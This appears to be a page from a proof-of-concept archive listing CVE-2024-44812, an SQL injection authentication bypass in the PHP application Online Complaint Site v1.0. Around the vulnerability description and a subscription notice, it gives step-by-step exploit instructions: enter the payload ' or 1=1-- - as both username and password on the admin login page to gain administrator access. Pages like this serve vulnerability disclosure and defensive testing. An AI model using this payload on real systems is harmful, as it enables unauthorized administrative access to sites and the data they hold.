Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-44812 PoC — Online Complaint Site 安全漏洞

Source
Associated Vulnerability
Title:Online Complaint Site 安全漏洞 (CVE-2024-44812)
Description:SQL Injection vulnerability in Online Complaint Site v.1.0 allows a remote attacker to escalate privileges via the username and password parameters in the /admin.index.php component.
Description
Proof of Concept Exploit for CVE-2024-44812 - SQL Injection Authentication Bypass vulnerability in Online Complaint Site v1.0
Readme
Proof of Concept Exploit for CVE-2024-44812 - SQL Injection Authentication Bypass vulnerability in Online Complaint Site v1.0

```
# Proof of Concept:

Step 1 – Visit http://localhost/complaintsite/
Step 2 – Click on "admin" button and redirect on login page.
Step 3 – Enter username as ' or 1=1-- - and password as ' or 1=1-- -
Step 4 – Click Login and now you will be logged in as admin.
```
File Snapshot

[4.0K] /data/pocs/443e3976ab89f79f2584a97e09440decd7b771f4 ├── [ 267] poc.txt └── [ 402] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →